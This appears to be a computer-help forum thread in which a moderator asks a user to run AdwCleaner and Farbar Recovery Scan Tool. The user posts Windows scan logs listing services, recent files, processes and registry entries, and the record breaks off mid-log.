S3 PNPMEM;Microsoft Memory Module Driver;C:\WINDOWS\System32\drivers\pnpmem.sys [2018-4-11 16896]
S3 PushToInstall;Windows PushToInstall Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 Ramdisk;Windows RAM Disk Driver;C:\WINDOWS\System32\drivers\ramdisk.sys [2018-4-11 39840]
S3 ReFS;ReFS;C:\WINDOWS\System32\drivers\refs.sys [2018-8-17 1921944]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2018-8-17 945568]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k rdxgroup [2018-4-11 51288]
S3 rhproxy;Resource Hub proxy driver;C:\WINDOWS\System32\drivers\rhproxy.sys [2018-4-11 104448]
S3 RTL8168;Realtek 8168 NT Driver;C:\WINDOWS\System32\drivers\Rt630x64.sys [2018-8-16 690832]
S3 SandraAgentSrv;SiSoftware Deployment Agent Service;C:\Program Files\SiSoftware\SiSoftware Sandra Lite Titanium.RTMa\RpcAgentSrv.exe [2018-9-14 136192]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2018-4-11 51288]
S3 scmbus;Microsoft Storage Class Memory Bus Driver;C:\WINDOWS\System32\drivers\scmbus.sys [2018-8-17 128920]
S3 SDFRd;SDF Reflector;C:\WINDOWS\System32\drivers\SDFRd.sys [2018-4-11 33176]
S3 SEMgrSvc;Payments and NFC/SE Manager;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2018-4-11 1273344]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2018-4-11 154528]
S3 SharedRealitySvc;Spatial Data Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 SmbDrv;SmbDrv;C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [2012-8-24 41272]
S3 SmbDrvI;SmbDrvI;C:\WINDOWS\System32\drivers\Smb_driver_Intel.sys [2012-8-24 43832]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2018-4-11 51288]
S3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 SpatialGraphFilter;Holographic Spatial Graph Filter;C:\WINDOWS\System32\drivers\SpatialGraphFilter.sys [2018-4-11 57752]
S3 spectrum;Windows Perception Service;C:\WINDOWS\System32\Spectrum.exe [2018-8-17 976384]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2018-8-17 105368]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2018-8-17 48544]
S3 TieringEngineService;Storage Tiers Management;C:\WINDOWS\System32\TieringEngineService.exe [2018-4-11 303616]
S3 tzautoupdate;Auto Time Zone Updater;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2018-4-11 128512]
S3 UcmTcpciCx0101;UCM-TCPCI KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmTcpciCx.sys [2018-4-11 152576]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2018-4-11 57856]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2018-4-11 45056]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2018-8-17 29600]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2018-4-11 282008]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2018-4-11 98200]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2018-4-11 144288]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2018-4-11 29088]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2018-4-11 67992]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2018-4-11 28064]
S3 VacSvc;Volumetric Audio Compositor Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2018-4-11 35328]
S3 vmgid;Microsoft Hyper-V Guest Infrastructure Driver;C:\WINDOWS\System32\drivers\vmgid.sys [2018-8-17 10240]
S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 vmicvmsession;Hyper-V PowerShell Direct Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 w3logsvc;W3C Logging Service;C:\WINDOWS\System32\svchost.exe -k apphost [2018-4-11 51288]
S3 WaaSMedicSvc;Windows Update Medic Service;C:\WINDOWS\System32\svchost.exe -k wusvcs -p [2018-4-11 51288]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
S3 wcnfs;Windows Container Name Virtualization;C:\WINDOWS\System32\drivers\wcnfs.sys [2018-4-11 82944]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2018-8-17 781824]
S3 WdmCompanionFilter;WdmCompanionFilter;C:\WINDOWS\System32\drivers\WdmCompanionFilter.sys [2018-4-11 21408]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2018-4-11 32152]
S3 WinNat;Windows NAT Driver;C:\WINDOWS\System32\drivers\winnat.sys [2018-8-17 227840]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2018-4-11 64920]
S3 WUDFWpdMtp;WUDFWpdMtp;C:\WINDOWS\System32\drivers\WUDFRd.sys [2018-4-11 264192]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2018-8-17 295424]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2018-4-11 46592]
S4 hvcrash;hvcrash;C:\WINDOWS\System32\drivers\hvcrash.sys [2018-4-11 33184]
S4 shpamsvc;Shared PC Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S4 ssh-agent;OpenSSH Authentication Agent;C:\WINDOWS\System32\OpenSSH\ssh-agent.exe [2018-4-12 495616]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=C:\WINDOWS\System32\NOTEPAD.EXE %1 [UserChoice]
ShellExec: opera.exe: open="C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\Launcher.exe" "%1"
.
=============== Created Last 30 ================
.
2018-10-09 08:44:41 14652992 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{765F7C9F-1CB4-4B4B-A7B4-9A30AEF02AB2}\mpengine.dll
2018-10-09 07:07:14 14652992 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\mpengine.dll
2018-10-04 07:15:04 -------- d-----w- C:\Program Files (x86)\Ruiware
2018-10-04 07:15:03 -------- d-----w- C:\ProgramData\InstallMate
2018-09-30 05:31:57 -------- d-----w- C:\WINDOWS\SysWow64\wdegbma
2018-09-29 02:10:59 -------- d-----w- C:\Program Files (x86)\Microsoft ASP.NET
2018-09-28 04:42:44 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\CEF
2018-09-28 04:42:24 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\Facebook
2018-09-25 06:22:32 -------- d-----w- C:\WINDOWS\Panther
2018-09-22 17:04:38 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\Cyberlink
2018-09-20 10:13:39 1821184 ----a-w- C:\WINDOWS\System32\IDTNC64.cpl
2018-09-20 10:12:31 542208 ----a-w- C:\WINDOWS\System32\drivers\stwrt64.sys
2018-09-20 10:12:30 499200 ----a-w- C:\WINDOWS\System32\stcplx64.dll
2018-09-20 10:12:29 671744 ------w- C:\WINDOWS\System32\stapi64.dll
2018-09-20 10:12:29 255488 ----a-w- C:\WINDOWS\System32\st646425.dll
2018-09-20 10:12:29 2188800 ----a-w- C:\WINDOWS\System32\stapo64.dll
2018-09-20 10:12:14 -------- d-----w- C:\Program Files\IDT
2018-09-20 08:42:02 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\AppEx Networks
2018-09-20 08:37:15 228032 ----a-w- C:\WINDOWS\System32\drivers\appexDrv.sys
2018-09-20 08:37:14 -------- d-----w- C:\Program Files\AMD Quick Stream
2018-09-20 08:37:09 -------- d-----w- C:\Program Files (x86)\Common Files\ATI Technologies
2018-09-20 08:37:09 -------- d-----w- C:\Program Files (x86)\AMD AVT
2018-09-20 08:35:42 -------- d-----w- C:\Program Files\ATI Technologies
2018-09-20 08:23:04 -------- d-----w- C:\AMD
2018-09-14 10:29:33 -------- d-----w- C:\T32768
2018-09-14 09:13:17 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Roaming\AMD
2018-09-14 08:39:12 -------- d-----w- C:\ProgramData\Package Cache
2018-09-14 08:38:25 -------- d-----w- C:\Program Files\SiSoftware
2018-09-12 09:46:59 2172928 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.onecore.dll
.
==================== Find3M ====================
.
2018-10-06 07:18:38 65536 ----a-w- C:\WINDOWS\System32\spu_storage.bin
2018-09-25 06:33:29 60584 ----a-w- C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys
2018-09-25 06:33:28 46184 ----a-w- C:\WINDOWS\System32\drivers\wd\WdBoot.sys
2018-09-25 06:33:28 352424 ----a-w- C:\WINDOWS\System32\drivers\wd\WdFilter.sys
2018-09-04 23:04:15 835144 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
2018-09-04 23:04:15 179808 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
2018-08-31 07:46:43 542504 ----a-w- C:\WINDOWS\System32\pcasvc.dll
2018-08-31 07:45:55 348328 ----a-w- C:\WINDOWS\System32\MusNotifyIcon.exe
2018-08-31 07:43:10 1524152 ----a-w- C:\WINDOWS\System32\msctf.dll
2018-08-31 07:42:49 1636232 ----a-w- C:\WINDOWS\System32\gdi32full.dll
2018-08-31 07:27:25 56320 ----a-w- C:\WINDOWS\System32\mf3216.dll
2018-08-31 07:27:10 178176 ----a-w- C:\WINDOWS\System32\t2embed.dll
2018-08-31 07:26:21 101888 ----a-w- C:\WINDOWS\System32\drivers\bowser.sys
2018-08-31 07:25:18 270336 ----a-w- C:\WINDOWS\System32\spp.dll
2018-08-31 07:25:12 266752 ----a-w- C:\WINDOWS\System32\rstrui.exe
2018-08-31 07:24:35 482304 ----a-w- C:\WINDOWS\System32\srcore.dll
2018-08-31 07:24:33 1127936 ----a-w- C:\WINDOWS\System32\nettrace.dll
2018-08-31 07:23:48 1364992 ----a-w- C:\WINDOWS\System32\bcastdvruserservice.dll
2018-08-31 07:23:34 765440 ----a-w- C:\WINDOWS\System32\tdh.dll
2018-08-31 07:22:53 1855488 ----a-w- C:\WINDOWS\System32\msxml3.dll
2018-08-31 07:22:19 1661440 ----a-w- C:\WINDOWS\System32\GdiPlus.dll
2018-08-31 06:55:04 1455960 ----a-w- C:\WINDOWS\SysWow64\gdi32full.dll
2018-08-31 06:53:26 1327504 ----a-w- C:\WINDOWS\SysWow64\msctf.dll
2018-08-31 06:41:56 43008 ----a-w- C:\WINDOWS\SysWow64\mf3216.dll
2018-08-31 06:41:34 138752 ----a-w- C:\WINDOWS\SysWow64\t2embed.dll
2018-08-31 06:40:01 216576 ----a-w- C:\WINDOWS\SysWow64\spp.dll
2018-08-31 06:37:50 622080 ----a-w- C:\WINDOWS\SysWow64\tdh.dll
2018-08-31 06:37:13 1585664 ----a-w- C:\WINDOWS\SysWow64\msxml3.dll
2018-08-31 06:36:04 1469952 ----a-w- C:\WINDOWS\SysWow64\GdiPlus.dll
2018-08-31 03:50:07 270648 ----a-w- C:\WINDOWS\System32\SgrmEnclave_secure.dll
2018-08-31 03:50:05 273720 ----a-w- C:\WINDOWS\System32\SgrmEnclave.dll
2018-08-31 03:44:28 1222440 ----a-w- C:\WINDOWS\System32\hvix64.exe
2018-08-31 03:44:27 1030952 ----a-w- C:\WINDOWS\System32\hvax64.exe
2018-08-31 03:44:22 76256 ----a-w- C:\WINDOWS\System32\drivers\hvservice.sys
2018-08-31 03:44:19 1064744 ----a-w- C:\WINDOWS\System32\SecConfig.efi
2018-08-31 03:44:18 568600 ----a-w- C:\WINDOWS\System32\tcblaunch.exe
2018-08-31 03:44:15 136488 ----a-w- C:\WINDOWS\System32\hvloader.dll
2018-08-31 03:43:40 722880 ----a-w- C:\WINDOWS\System32\ci.dll
2018-08-31 03:43:19 2719216 ----a-w- C:\WINDOWS\System32\drivers\tcpip.sys
2018-08-31 03:28:56 1989496 ----a-w- C:\WINDOWS\SysWow64\msxml6.dll
2018-08-31 03:28:50 1514352 ----a-w- C:\WINDOWS\SysWow64\WindowsCodecs.dll
2018-08-31 03:28:44 6043680 ----a-w- C:\WINDOWS\SysWow64\windows.storage.dll
2018-08-31 03:28:42 134936 ----a-w- C:\WINDOWS\SysWow64\gdi32.dll
2018-08-31 03:28:38 6570040 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.Protection.PlayReady.dll
2018-08-31 03:28:37 453104 ----a-w- C:\WINDOWS\SysWow64\dpx.dll
2018-08-31 03:28:24 1129728 ----a-w- C:\WINDOWS\SysWow64\msvproc.dll
2018-08-31 03:28:20 568568 ----a-w- C:\WINDOWS\SysWow64\CoreMessaging.dll
2018-08-31 03:26:44 25847808 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2018-08-31 03:21:14 22008320 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2018-08-31 03:18:30 8189440 ----a-w- C:\WINDOWS\System32\Windows.Data.Pdf.dll
2018-08-31 03:17:08 144384 ----a-w- C:\WINDOWS\System32\mssprxy.dll
2018-08-31 03:17:01 20480 ----a-w- C:\WINDOWS\System32\netevent.dll
2018-08-31 03:16:47 6661120 ----a-w- C:\WINDOWS\SysWow64\Windows.Data.Pdf.dll
2018-08-31 03:16:03 4382720 ----a-w- C:\WINDOWS\System32\EdgeContent.dll
2018-08-31 03:15:44 4866560 ----a-w- C:\WINDOWS\System32\jscript9.dll
2018-08-31 03:15:40 3392512 ----a-w- C:\WINDOWS\System32\tquery.dll
2018-08-31 03:15:13 7577088 ----a-w- C:\WINDOWS\System32\Chakra.dll
2018-08-31 03:15:07 894464 ----a-w- C:\WINDOWS\System32\webplatstorageserver.dll
2018-08-31 03:15:03 395776 ----a-w- C:\WINDOWS\System32\Search.ProtocolHandler.MAPI2.dll
2018-08-31 03:15:02 75776 ----a-w- C:\WINDOWS\System32\drivers\mpsdrv.sys
2018-08-31 03:14:53 2700288 ----a-w- C:\WINDOWS\SysWow64\tquery.dll
2018-08-31 03:14:50 154112 ----a-w- C:\WINDOWS\System32\Chakradiag.dll
2018-08-31 03:14:42 898560 ----a-w- C:\WINDOWS\System32\WpcWebFilter.dll
2018-08-31 03:14:31 808448 ----a-w- C:\WINDOWS\System32\EdgeManager.dll
2018-08-31 03:14:26 726528 ----a-w- C:\WINDOWS\System32\jscript9diag.dll
2018-08-31 03:13:19 402432 ----a-w- C:\WINDOWS\System32\drivers\ks.sys
2018-08-31 03:13:07 2738688 ----a-w- C:\WINDOWS\System32\mssrch.dll
2018-08-31 03:13:01 1708544 ----a-w- C:\WINDOWS\System32\MSPhotography.dll
2018-08-31 03:12:51 736256 ----a-w- C:\WINDOWS\System32\drivers\srv2.sys
2018-08-31 03:12:36 20480 ----a-w- C:\WINDOWS\SysWow64\netevent.dll
2018-08-31 03:11:38 796672 ----a-w- C:\WINDOWS\System32\mssvp.dll
2018-08-31 03:11:29 2236928 ----a-w- C:\WINDOWS\System32\win32kbase.sys
2018-08-31 03:11:19 1854976 ----a-w- C:\WINDOWS\System32\wevtsvc.dll
2018-08-31 03:11:18 1057792 ----a-w- C:\WINDOWS\System32\SearchIndexer.exe
2018-08-31 03:11:11 604160 ----a-w- C:\WINDOWS\System32\updatehandlers.dll
2018-08-31 03:11:07 406528 ----a-w- C:\WINDOWS\System32\SearchProtocolHost.exe
2018-08-31 03:10:55 608768 ----a-w- C:\WINDOWS\SysWow64\EdgeManager.dll
2018-08-31 03:10:55 1375744 ----a-w- C:\WINDOWS\System32\usocore.dll
2018-08-31 03:10:49 3711488 ----a-w- C:\WINDOWS\SysWow64\jscript9.dll
2018-08-31 03:10:45 5777920 ----a-w- C:\WINDOWS\SysWow64\Chakra.dll
2018-08-31 03:10:42 889344 ----a-w- C:\WINDOWS\System32\schedsvc.dll
2018-08-31 03:10:40 288768 ----a-w- C:\WINDOWS\SysWow64\Search.ProtocolHandler.MAPI2.dll
2018-08-31 03:10:28 1361408 ----a-w- C:\WINDOWS\SysWow64\MSPhotography.dll
2018-08-31 03:10:27 561152 ----a-w- C:\WINDOWS\SysWow64\jscript9diag.dll
2018-08-31 03:10:26 176640 ----a-w- C:\WINDOWS\System32\mssph.dll
2018-08-31 03:09:58 578560 ----a-w- C:\WINDOWS\SysWow64\webplatstorageserver.dll
2018-08-31 03:09:23 2258944 ----a-w- C:\WINDOWS\SysWow64\mssrch.dll
2018-08-31 03:08:28 619520 ----a-w- C:\WINDOWS\SysWow64\WpcWebFilter.dll
2018-08-31 03:07:32 856064 ----a-w- C:\WINDOWS\SysWow64\SearchIndexer.exe
2018-08-31 03:07:14 735744 ----a-w- C:\WINDOWS\SysWow64\mssvp.dll
2018-08-31 0357 345088 ----a-w- C:\WINDOWS\SysWow64\SearchProtocolHost.exe
2018-08-30 04:44:37 152688 ----a-w- C:\WINDOWS\System32\drivers\mbae64.sys
2018-08-28 09:27:28 1952768 ----a-w- C:\WINDOWS\NDE2ZDRjZ.exe
2018-08-28 07:17:55 23862784 ----a-w- C:\WINDOWS\System32\Hydrogen.dll
2018-08-28 06:56:08 1008640 ----a-w- C:\WINDOWS\System32\Windows.Media.MixedRealityCapture.dll
2018-08-28 06:49:46 677376 ----a-w- C:\WINDOWS\System32\HeadTrackerStorage.dll
2018-08-28 06:48:22 1274368 ----a-w- C:\WINDOWS\System32\HoloSI.PCShell.dll
2018-08-28 06:45:57 713216 ----a-w- C:\WINDOWS\System32\SharedRealitySvc.dll
2018-08-28 05:51:14 868864 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.MixedRealityCapture.dll
2018-08-18 00:47:08 563832 ------w- C:\WINDOWS\System32\MpSigStub.exe
.
============= FINISH: 2010.54 ===============
Attached Files
File Type: txt attach.txt (11.1 KB, 7 views)
angelgabbby is offline  
Old 10-10-2018, 03:28 AM   #2
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello and Welcome to TSF.

If you haven't already, please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

Please download AdwCleaner from here and save it to your desktop.
  • Run AdwCleaner and select Scan Now
  • Once the Scan is done, select Clean & Repair
  • When prompted, select Clean & Restart Now
  • On reboot, a log will be produced. It can also be found at C:\AdwCleaner\Logs\AdwCleaner[C0#].txt
  • Please copy/paste the contents of the log in your next reply.
------------------------------------------------------

Please download Farbar Recovery Scan Tool and save it to your desktop.
  • Double-click FRST64 to run it. When the tool opens click Yes to the disclaimer.
  • Make sure the Addition.txt button is ticked.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • It also makes another log (Addition.txt). Please attach it to your reply.
------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 10-10-2018, 04:54 PM   #3
Registered Member
 
Join Date: Jun 2007
Location: Tulsa, Oklahoma
Posts: 36
OS: 10



ADWCLEANER'S--------

# -------------------------------
# Malwarebytes AdwCleaner 7.2.3.0
# -------------------------------
# Build: 08-30-2018
# Database: (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 10-10-2018
# Duration: 00:00:13
# OS: Windows 10 Home
# Cleaned: 1
# Failed: 0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

Deleted C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

No malicious registry entries cleaned.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [3563 octets] - [29/08/2018 01:27:16]
AdwCleaner[C00].txt - [3159 octets] - [29/08/2018 01:29:24]
AdwCleaner[S01].txt - [1433 octets] - [10/10/2018 18:16:59]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########



FARBAR---------

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 10.10.2018
Ran by Christopher&Gabriell (administrator) on GABBYSNOTEBOOK (10-10-2018 18:41:47)
Running from C:\Users\Christopher&Gabriell\Desktop
Loaded Profiles: Christopher&Gabriell (Available Profiles: Christopher&Gabriell)
Platform: Windows 10 Home Version 1803 17134.345 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Opera)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1809.2-0\MsMpEng.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1809.2-0\NisSrv.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(ALCPU) C:\Program Files\Core Temp\Core Temp.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Microsoft Corporation) C:\Windows\System32\CastSrv.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Ruiware) C:\Program Files (x86)\Ruiware\WinPatrol\WinPatrol.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera_crashreporter.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
(Opera Software) C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-11] (Microsoft Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3954352 2016-04-28] (Synaptics Incorporated)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1664000 2012-08-19] (IDT, Inc.)
HKLM-x32\...\Run: [HP CoolSense] => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [1342008 2012-09-14] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-09-15] (Advanced Micro Devices, Inc.)
HKU\S-1-5-21-2942939960-1714500650-1008813090-1002\...\Run: [WinPatrol] => C:\Program Files (x86)\Ruiware\WinPatrol\winpatrol.exe [1223560 2017-05-07] (Ruiware)
HKU\S-1-5-21-2942939960-1714500650-1008813090-1002\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\Mystify.scr [149504 2018-04-11] (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{982D5C35-5D95-44B3-84D9-0D16030AAD83}: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12

Internet Explorer:
==================
SearchScopes: HKU\S-1-5-21-2942939960-1714500650-1008813090-1002 -> DefaultScope {585D9B7B-5172-4702-AD1E-BD0C4BBF4A16} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
SearchScopes: HKU\S-1-5-21-2942939960-1714500650-1008813090-1002 -> {585D9B7B-5172-4702-AD1E-BD0C4BBF4A16} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-21] (HP Inc.)
DPF: HKLM-x32 {0E5F0222-96B9-11D3-8997-00104BD12D94} hxxp://www.pcpitstop.com/nirvana/controls/pcmatic.cab
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2018-02-14] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2018-06-12] (Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2018-02-14] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2018-06-12] (Microsoft Corporation)

FireFox:
========
